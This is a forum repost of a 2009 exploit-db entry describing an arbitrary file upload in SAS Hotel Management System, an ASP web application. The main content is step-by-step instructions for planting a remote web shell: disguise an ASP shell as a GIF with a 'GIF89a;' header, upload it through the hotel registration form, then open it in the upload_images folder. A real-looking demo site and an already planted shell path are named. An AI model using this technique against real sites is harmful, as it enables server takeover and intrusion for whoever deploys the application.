Exploit SAS Hotel Management System - Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8070
Проверка EDB
  1. Пройдено
Автор
ZORLU
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
null
Дата публикации
2009-02-17
Код:
[~] SAS Hotel Management System Remote Shell Upload
[~]
[~] Demo: http://www.aebest.com/home/home.asp
[~] ----------------------------------------------------------
[~] home: yildirimordulari.com   if you wanna help you must register to my site and ı will do help to you  xD
[~]
[~] home: yildirimordulari.com   eger yardim istiyosan siteye uye olmalisin xD
[~]
[~] author: ZoRLu  msn: [email protected]  
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] Date:17/02/09
[~]
[~] My Best Friend: Dr.LY0N
[~] -----------------------------------------------------------

add this code your shell:

GIF89a;

after you go here : http://www.yildirim.com/register_hotel.asp

select your photo but photo must be your shell.asp

after finished you register

your shell here: http://www.yildirim.com/upload_images/shell.asp

 
for demo:

here:  http://www.aebest.com/home/register_hotel.asp

shell: http://www.aebest.com/upload_images/z.asp

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Dr.LY0N & z3h!r & HEAD_HUNTER and yildirimordulari.com all users
[~]
[~] yildirimordulari.com  &  experl.com & z0rlu.blogspot.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-02-17]
 
Источник
www.exploit-db.com

Похожие темы